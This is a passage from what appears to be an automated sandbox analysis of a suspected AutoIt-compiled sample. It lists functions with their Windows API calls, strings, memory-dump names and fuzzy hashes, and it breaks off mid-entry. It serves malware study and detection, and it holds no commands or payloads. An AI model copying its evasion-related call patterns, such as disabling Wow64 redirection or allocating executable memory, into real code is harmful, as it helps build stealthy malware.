GetWindowLongW.USER32 ref: 00C579FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C57A0C

Strings

SysTreeView32, xrefs: 00C579B1

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 1831ffe59b7c105b864d134543134a274e61a2892409d15028ebed280c0bf0e5
Instruction ID: 35b5d321b89b3cbd5d0a991f320e88ccd1d993a892a1ad1761bba62b6f9b6322
Opcode Fuzzy Hash: 1831ffe59b7c105b864d134543134a274e61a2892409d15028ebed280c0bf0e5
Instruction Fuzzy Hash: 1C31ED35204206ABDB158F38EC05BEA77A9EF04325F204725F875A32E0E730EAD59B64

Function 00C573D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00C57461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00C57475
SendMessageW.USER32(?,00001002,00000000,?), ref: 00C57499

Strings

SysMonthCal32, xrefs: 00C5742C

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 078b9adf1885b4da7601b50d0ec8600a76c70876a2a36cc917c2df6ff4b677e2
Instruction ID: d91730072d395ddf79f558ab6eadfc7e597cabceb7b6cd9b4bbdbbb222b8a6fa
Opcode Fuzzy Hash: 078b9adf1885b4da7601b50d0ec8600a76c70876a2a36cc917c2df6ff4b677e2
Instruction Fuzzy Hash: D321EF32500218ABDF118EA4DC46FEA3BAAEB48724F110214FE146B190DB75AC95DBA0

Function 00C57B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00C57C4A
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00C57C58
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C57C5F

Strings

msctls_updown32, xrefs: 00C57BC4

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 8f7436c3f75b7044020fd6ed91fd119f705d990139efae8e53c48f5871276603
Instruction ID: 95918cf380169764dd38ecbcaffb574a3d6f06fd782e601e65bcbb88ad58dc19
Opcode Fuzzy Hash: 8f7436c3f75b7044020fd6ed91fd119f705d990139efae8e53c48f5871276603
Instruction Fuzzy Hash: 8B217FB9604208AFDB11DF18DCC1D6A37ECEB4A355B140159FA119B3A1CB31ED858B64

Function 00C56CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00C56D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C56D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00C56D70

Strings

Listbox, xrefs: 00C56D08

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 31a803335db4ff9a83b1695ca2781f1af780bb3e9860bf90813572cce245bb30
Instruction ID: 34d8f30bd4df07aa6467943b99ada542691f2fa2704bc6d085f28ed05d697e84
Opcode Fuzzy Hash: 31a803335db4ff9a83b1695ca2781f1af780bb3e9860bf90813572cce245bb30
Instruction Fuzzy Hash: 3121F236600118BFDF158F54CC44FBB3BBAEF89751F408128F9509B1A0CA71AC958BA4

Function 00C5770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00C57772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00C57787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00C57794

Strings

msctls_trackbar32, xrefs: 00C57749

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 3a4dd1bf99ba738d3f36f7519c37f33ec40880182afb5b692c3515b5979eb5be
Instruction ID: 9c1cecfb9f80dd7f6d4c961c4653f44a60c4405684e92aef79292a30c4450af4
Opcode Fuzzy Hash: 3a4dd1bf99ba738d3f36f7519c37f33ec40880182afb5b692c3515b5979eb5be
Instruction Fuzzy Hash: 88113A76200208BFEF255F65EC05FEB77A9EF8CB55F010228FA51A2090D671E891CB14

Function 00BD4C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00BD4B83,?), ref: 00BD4C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BD4C56

Strings

kernel32.dll, xrefs: 00BD4C3F
Wow64RevertWow64FsRedirection, xrefs: 00BD4C50

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 78abc1249b76b92f4815f44c0b908f33cf32b9fd641bc016bdb722db6538fa28
Instruction ID: 4a09344c8c346075667a3ae59541b0fb8682eb26e12b6a15112ae8f2e47afc8d
Opcode Fuzzy Hash: 78abc1249b76b92f4815f44c0b908f33cf32b9fd641bc016bdb722db6538fa28
Instruction Fuzzy Hash: ABD01775520B13CFD728AF31D90870FBBE4EF05352B15887E9896E6A60E7B0D8C0CA50

Function 00BD4C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00BD4BD0,?,00BD4DEF,?,00C952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00BD4C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BD4C23

Strings

Wow64DisableWow64FsRedirection, xrefs: 00BD4C1D
kernel32.dll, xrefs: 00BD4C0C

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: dd889806d346cdc11d55c19865ebd31bdf353a0f5aa87e0c6cebcb82f905e37b
Instruction ID: fc3baf23739ad4edee1728a55bbaabc0fa0d484410b7595ec4fc0e02d509fb1f
Opcode Fuzzy Hash: dd889806d346cdc11d55c19865ebd31bdf353a0f5aa87e0c6cebcb82f905e37b
Instruction Fuzzy Hash: 67D0C734520B13CFC720AF74C94870BBAE5EF08342B048C3E9882E2260E7B0C8C1CB50

Function 00C50DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00C51039), ref: 00C50DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C50E07

Strings

RegDeleteKeyExW, xrefs: 00C50E01
advapi32.dll, xrefs: 00C50DF0

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 29dd6f17a78cb335e36e76f608dc6b4b5d00b913c4f79fb641a058ff6d94ca52
Instruction ID: e70b8d84320d51435865a1097fe029e90c8ed90ef2dbc2b63a36df0a150fff32
Opcode Fuzzy Hash: 29dd6f17a78cb335e36e76f608dc6b4b5d00b913c4f79fb641a058ff6d94ca52
Instruction Fuzzy Hash: 96D08238400B22CFC321AB70C80938BB2E4AF00342F248C3E98D2E2150E6B0D8D08B48

Function 00C490E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00C48CF4,?,00C5F910), ref: 00C490EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00C49100

Strings

GetModuleHandleExW, xrefs: 00C490FA
kernel32.dll, xrefs: 00C490E9

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 6da2806b7a00f5651761d8ec29e0f1e896540705c65a0f9251e83227756ff7a2
Instruction ID: 3821027f006401ab13a8c5067cf4fbbcdead8e35f61e4997f752f8ca06bb173f
Opcode Fuzzy Hash: 6da2806b7a00f5651761d8ec29e0f1e896540705c65a0f9251e83227756ff7a2
Instruction Fuzzy Hash: A2D01739510B23CFDB24AF71D81870F76E4EF05352B12883E9996E6990EA70C8C0CB90

Function 00C11714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00C11718
__swprintf.LIBCMT ref: 00C11749

Strings

WIN_XPe, xrefs: 00C11788
%.3d, xrefs: 00C11723

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 75d303e309be3b56eab414cde32151b11b7e4b8a671f9123a28f837066f1b68a
Instruction ID: 4dea9a309a680750cde1e4c0653f7c4482f50d88c2dfad7fb1fd14aee753063b
Opcode Fuzzy Hash: 75d303e309be3b56eab414cde32151b11b7e4b8a671f9123a28f837066f1b68a
Instruction Fuzzy Hash: 0CD01275809109FAC70596929C8C9FD77BCA70A301F180462FB02E2280E23987D4F661

Function 00C2717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e688d9e00d97c92d3bc29ffc2dbbde9b5417b304b6e3e5070c2e22cbf003177
Instruction ID: 8d1e51b15d0eddc4c5288fc5560d01447264d5b05cbac9866c987ad8ae601485
Opcode Fuzzy Hash: 3e688d9e00d97c92d3bc29ffc2dbbde9b5417b304b6e3e5070c2e22cbf003177
Instruction Fuzzy Hash: 89C19175A04226EFCB14DF94D8C4EAEBBB5FF48304B148698E815EB651D730EE81DB90

Function 00C4E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00C4E0BE
CharLowerBuffW.USER32(?,?), ref: 00C4E101

Part of subcall function 00C4D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C4D7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00C4E301
_memmove.LIBCMT ref: 00C4E314

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 2534d5ad1ad7b4df4cd51fdd0219eb6496502eb60e0b48d5247e757c6ca0a1df
Instruction ID: 545d7fe65b241b82001ae46e867240a61ccf599ddf3de72f6b3c52b803adae90
Opcode Fuzzy Hash: 2534d5ad1ad7b4df4cd51fdd0219eb6496502eb60e0b48d5247e757c6ca0a1df
Instruction Fuzzy Hash: BAC15B71A04301DFC714DF28C480A6ABBE4FF89714F15896EF8999B362D771EA46CB81

Function 00C48093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00C480C3
CoUninitialize.OLE32 ref: 00C480CE

Part of subcall function 00C2D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C2D5D4

VariantInit.OLEAUT32(?), ref: 00C480D9
VariantClear.OLEAUT32(?), ref: 00C483AA

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 93844fa044b42c15a857857a28a24efa9e2d379e0fc7ca04df2fdb5f982e7163
Instruction ID: 13fb652c9e7602f286e0a42aa0f91138ec1c465ba1b624263e2a1791bf4a8abd
Opcode Fuzzy Hash: 93844fa044b42c15a857857a28a24efa9e2d379e0fc7ca04df2fdb5f982e7163
Instruction Fuzzy Hash: A2A16875604B019FCB10EF25C481B2EB7E4BF89764F044459F996AB3A2DB30ED49DB82

Function 00C27530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00C62C7C,?), ref: 00C276EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00C62C7C,?), ref: 00C27702
CLSIDFromProgID.OLE32(?,?,00000000,00C5FB80,000000FF,?,00000000,00000800,00000000,?,00C62C7C,?), ref: 00C27727
_memcmp.LIBCMT ref: 00C27748

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: d49da541776bb25b3d188c9967740a89d2c68a422e4725cb3a2a3d88a75df9b8
Instruction ID: 1c4af8322a1689cc7185a34733c64ed29af18be80c0925046504d65474e65d42
Opcode Fuzzy Hash: d49da541776bb25b3d188c9967740a89d2c68a422e4725cb3a2a3d88a75df9b8
Instruction Fuzzy Hash: 71813B75A00119EFCB04DFA4C988EEEB7B9FF89315F204198F515AB250DB71AE46CB60

Function 00C2687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C2688E
SysAllocString.OLEAUT32(00000000), ref: 00C26937
VariantCopy.OLEAUT32 ref: 00C26966
VariantClear.OLEAUT32(?), ref: 00C2698D

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: cd466fda92193fd7991bdb0522edf06760d3cebe4df2a2bf2a96d7c9092348e4
Instruction ID: 1dbc96b23fcac1219fd5d2f5f4365c3496b4bfbc632e265c59dddc118a3eb9a3
Opcode Fuzzy Hash: cd466fda92193fd7991bdb0522edf06760d3cebe4df2a2bf2a96d7c9092348e4
Instruction Fuzzy Hash: F5518474610311DADB24AF65E8A173AF3E5AF45310F20D81FE596DBA91DB70DC80A721

Function 00C597F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(017EDCC0,?), ref: 00C59863
ScreenToClient.USER32(00000002,00000002), ref: 00C59896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00C59903

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: fcd58b4036451cee6f3a98aeef6dd48daac5c9d8eb19a13ae7a48c8aeca860da
Instruction ID: 86eb06f57e5a5f54ac0119c7b7def1f8a346a6cf7f3e3c3e554a9b81ff61d4e1
Opcode Fuzzy Hash: fcd58b4036451cee6f3a98aeef6dd48daac5c9d8eb19a13ae7a48c8aeca860da
Instruction Fuzzy Hash: 53514F38A00208EFCF14CF54D884AAE7BB5FF45361F1481ADF8659B2A0D730AE85CB94

Function 00C29A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00C29AD2
__itow.LIBCMT ref: 00C29B03

Part of subcall function 00C29D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00C29DBE

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00C29B6C
__itow.LIBCMT ref: 00C29BC3

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: c2bd47291a1d186e3754551d08f0b889162e99948d36d52e1a85f7a18655ee40
Instruction ID: 1765a2f05964cce8761886d5f4d6e7a4f62824d4c3ad8270e3983f31e62eb612
Opcode Fuzzy Hash: c2bd47291a1d186e3754551d08f0b889162e99948d36d52e1a85f7a18655ee40
Instruction Fuzzy Hash: 22417074A00318ABDF21EF54E845BEEBBF9EF44710F0400AAF915A7291EB709A44CB61

Function 00C469AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00C469D1
WSAGetLastError.WSOCK32(00000000), ref: 00C469E1

Part of subcall function 00BD9837: __itow.LIBCMT ref: 00BD9862
Part of subcall function 00BD9837: __swprintf.LIBCMT ref: 00BD98AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C46A45
WSAGetLastError.WSOCK32(00000000), ref: 00C46A51

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
